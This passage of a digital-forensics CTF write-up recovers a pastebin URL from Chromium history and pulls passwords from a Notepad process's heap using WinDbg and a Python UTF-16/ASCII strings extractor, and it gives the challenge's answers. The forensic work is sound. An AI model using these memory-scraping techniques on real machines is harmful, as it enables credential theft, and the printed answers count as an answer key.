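def webkit_to_datetime(microseconds: int) -> datetime:
    return WEBKIT_EPOCH + timedelta(microseconds=microseconds)


# Subset of the Chromium History schema's urls table (column names as in real files).
URLS_DDL = """
CREATE TABLE urls(
    id INTEGER PRIMARY KEY AUTOINCREMENT,
    url LONGVARCHAR,
    title LONGVARCHAR,
    visit_count INTEGER DEFAULT 0 NOT NULL,
    typed_count INTEGER DEFAULT 0 NOT NULL,
    last_visit_time INTEGER NOT NULL,
    hidden INTEGER DEFAULT 0 NOT NULL
)
"""

# Constructed rows standing in for the real History file. The pastebin URL is
# the one recovered in the writeup; titles, counts and times are made up.
SAMPLE_ROWS = [
    ("https://www.google.com/", "Google", 12, 5, 13299990000000000, 0),
    ("https://pastebin.com/qPsjHKrW", "Pastebin", 1, 1, 13300000000000000, 0),
    ("https://filebin.net/", "Filebin", 2, 0, 13299995000000000, 0),
]


def build_sample_history(conn: sqlite3.Connection) -> None:
    conn.executescript(URLS_DDL)
    conn.executemany(
        "INSERT INTO urls(url, title, visit_count, typed_count, last_visit_time, hidden)"
        " VALUES (?, ?, ?, ?, ?, ?)", SAMPLE_ROWS)
    conn.commit()


def open_history_readonly(path: str) -> sqlite3.Connection:
    """Open a copied History file without writing to it (the live file is locked by the browser)."""
    return sqlite3.connect(f"file:{path}?mode=ro", uri=True)


def query_history(conn, keyword=None, limit=50):
    """Most recent URLs first, optionally filtered by a substring of the URL or title."""
    sql = "SELECT url, title, visit_count, last_visit_time FROM urls"
    params = []
    if keyword:
        sql += " WHERE url LIKE ? OR title LIKE ?"
        params += [f"%{keyword}%", f"%{keyword}%"]
    sql += " ORDER BY last_visit_time DESC LIMIT ?"
    params.append(limit)
    return [(url, title, visits, webkit_to_datetime(ts).isoformat())
            for url, title, visits, ts in conn.execute(sql, params)]


if __name__ == "__main__":
    db = sqlite3.connect(":memory:")
    build_sample_history(db)
    for row in query_history(db):
        print(row)
```

Copy the History file out of the profile before opening it: the browser holds a lock on the live database, and opening it read-only avoids touching evidence.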

### Answer 5 : https://pastebin.com/qPsjHKrW
## Question 6

The pastebin paste is locked, so it is time to turn to the memory image.
Checking the process list we find a NotePad.exe process with PID = 6876.
I spent a long time on this question; the author hinted at heap allocations and pointed me to a blog post on the subject:
https://www.sans.org/blog/the-analysis-of-user-data-in-VADs-extraction-of-precise-data-in-notepad-memory-and-hunting-for-malware-behavior/
I used MemProcFS to convert the .mem image into a .dmp in the crash-dump format that WinDbg accepts,
then attached the debugger to the Notepad.exe process

and listed the heap allocations (VADs) of this process:
```
!heap -s -v -a
```
According to the blog, the allocations we need to examine must not carry the LFH or sub-segment flags and should carry the "extra user_flags" flag. In this heap list, however, I only saw one allocation marked "free user_flags". I checked its data but found nothing, because, per the flag description:
```
HEAP_ENTRY_BUSY: Indicates if a memory block is currently in use (1) or free (0) - this is the fundamental allocation status flag.
```
this allocation appears to have already been freed. The only option left is to dump the whole FirstEntry-LastValidEntry range of the heap allocation and inspect it.
Following the blog's steps gives the heap offset: 000001df84730000

Dump this heap region and filter it with strings + grep for the password; this cuts the amount of data right down, narrowing it to the range of the heap's FirstEntry allocation:
```
db 0x000001df`84730740 L 0xFE8C9
```
Two suspicious strings turn up:
```
Y24k8UPs
FUl i3deXy3QM3
```
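The "strings + grep" step, added here as a worked example (not part of the original writeup): a plain `strings` pass only sees ASCII, but Notepad keeps its edit buffer as UTF-16LE, so the extractor below scans for both encodings and then keeps only password-like tokens (8+ characters mixing upper case, lower case and digits), which drops paths and module names. The heap buffer it runs on is constructed to contain the two strings found above among filler; `scan_dump` is the same pipeline over a region saved to a file with WinDbg's `.writemem`.

```python
import re


def extract_strings(buf: bytes, min_len: int = 6):
    """Return (offset, encoding, text) for printable runs, like `strings -e s`
    plus `strings -e l`. Notepad's text lives in memory as UTF-16LE."""
    ascii_rx = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    utf16_rx = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    found = [(m.start(), "ascii", m.group().decode("ascii"))
             for m in ascii_rx.finditer(buf)]
    found += [(m.start(), "utf-16le", m.group().decode("utf-16le"))
              for m in utf16_rx.finditer(buf)]
    return sorted(found)


# Password-like tokens: 8+ characters from a typical password alphabet.
TOKEN_RX = re.compile(r"[A-Za-z0-9!@#$%^&*_\-+=]{8,}")


def candidate_secrets(strings):
    """The 'grep' step: keep tokens that mix upper case, lower case and digits."""
    out = []
    for off, enc, text in strings:
        for tok in TOKEN_RX.findall(text):
            if (any(c.isupper() for c in tok) and any(c.islower() for c in tok)
                    and any(c.isdigit() for c in tok)):
                out.append((off, enc, tok))
    return out


def build_sample_heap() -> bytes:
    """Constructed stand-in for a dumped heap range (not the real dump): the two
    strings from the writeup embedded among filler and typical noise."""
    filler = b"\x00" * 16 + b"\xab\xcd" * 4
    return (filler
            + "C:\\Windows\\notepad.exe".encode("utf-16le") + b"\x00\x00"
            + filler
            + "FUl i3deXy3QM3".encode("utf-16le") + b"\x00\x00"
            + filler
            + b"KERNELBASE.dll\x00"
            + filler
            + b"Y24k8UPs\x00"
            + filler)


def scan_dump(path: str):
    """Run both steps over a region written out with WinDbg's .writemem."""
    with open(path, "rb") as f:
        return candidate_secrets(extract_strings(f.read()))


if __name__ == "__main__":
    for off, enc, tok in candidate_secrets(extract_strings(build_sample_heap())):
        print(f"{off:#010x} {enc:9} {tok}")
```

The encoding column is the useful extra signal: a UTF-16LE hit inside Notepad's heap is text the user typed or loaded, while ASCII hits are more often module names and other runtime noise.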
### Answer 6: i3deXy3QM3
## Question 7
Using this password to unlock the pastebin paste gives the zip file's password.

### Answer 7 : KvvO60Zf69Yyq8